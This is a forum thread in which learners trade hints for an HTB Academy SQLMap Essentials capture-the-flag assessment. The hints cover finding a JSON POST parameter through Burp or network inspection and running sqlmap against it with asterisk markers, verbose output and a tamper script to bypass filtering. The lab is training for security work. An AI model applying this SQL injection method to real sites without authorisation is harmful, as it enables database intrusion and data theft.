HTB Academy SQLMap Essentials: Skill Assessment issues

Hello, I having quite a bit of difficulty establishing a foothold for the skills assessment involving a CTF of the minishop website. When I try running sqlmap on the shop or checkout pages it can’t find a parameter to exploit. However, when I run with a --forms --crawl=2 it finds forms on both these pages but can’t inject into the parameters. Any tips for this exercise? I’ve searched around, but there hasn’t been much discussion on this course.

I finally found a parameter that should be exploitable via a POST request with JSON. Heuristic tests are saying it is injectable, but I haven’t been able to get anything to take yet. Make sure you click all the buttons on the shop and look at the network requests. sqlmap isn’t going to find it with crawl or forms.

1 Like

Got the flag. My hints are as follows: 1. Locate the attack vector manually. 2. The asterisk character * is your friend. 3. -v is also your friend.

1 Like

Thanks for posting something about this assessment! Im having a hard time finding the attack vector manually. I will keep trying but as of now, I’m not sure what I’m missing within the network inspect views. > @ecutrigut said: > I finally found a parameter that should be exploitable via a POST request with JSON. Heuristic tests are saying it is injectable, but I haven’t been able to get anything to take yet. Make sure you click all the buttons on the shop and look at the network requests. sqlmap isn’t going to find it with crawl or forms.

Hello! I watched all menus but I can’t found the attack vector. I found POST request only the Copy Right link on https://colorlib.com/. Could you take more help in this challenge?

I solved it! You need to find the php JSON POST script on one side, after you find the hint.

Finally I got final_flag, my suggestion is 1. Inspect element to find POST request, I used Suiteburb to locate POST request and then “Inspect Element” 2. Copy cURL to SQLmap 3. Use * to find correct payloads

> @s3e said: > Finally I got final_flag, my suggestion is > 1. Inspect element to find POST request, I used Suiteburb to locate POST request and then “Inspect Element” > 2. Copy cURL to SQLmap > 3. Use * to find correct payloads Please somebody can tell me information about this: > 3. Use * to find correct payloads

1 Like

I second this. I’m stuck in the same place - i know the post request (axxxxx.php) but i can’t get the injection to work. There are 2no mentions above regarding using “*” but i can’t see where i would use that in a request.

Has anyone some FRESH advice on this flag?

My advice is don’t overthink. Pay attention to what sqlmap is showing using the hints already provided. you will notice what payload is suitable. once you find it, use it on your sqlmap command. It is easier than you think. :slight_smile:

I finally got to time to come back to this one. After finding the location point for the SQL injection…

For me, some of the comments above led me in the wrong direction:

  • I did not need to use ‘-v’ - all the information i needed was in the standard output (from an education point of view setting ‘-v 6’ is useful to see what sqlmap is actually doing
  • I did not need to use ’ * '. There is only 1no variable and so there is no place to use ’ * ’
  • I did not need to use CURL or ‘copy to CURL’. I saved the burb request to file.

An addition tip: the back end server is filtering requests but the solution is clearly stated in the SQLMAP output comments - you don’t need to trawl the module for the solution

I hope that is ACTIONABLE advice and is helpful

3 Likes

how u found it bro, i am hard stuck i can’t see anything i try it using burp and network tab

where you found it and how because I’ve tried to find it but haven’t seen anything

I am also stuck. I can find 4 tables with sqlmap (i found a tamper that is needed here) but nothing more. Cant dump schemas or contents, no file write, tried proxys and still stuck. Does anyone have a nudge?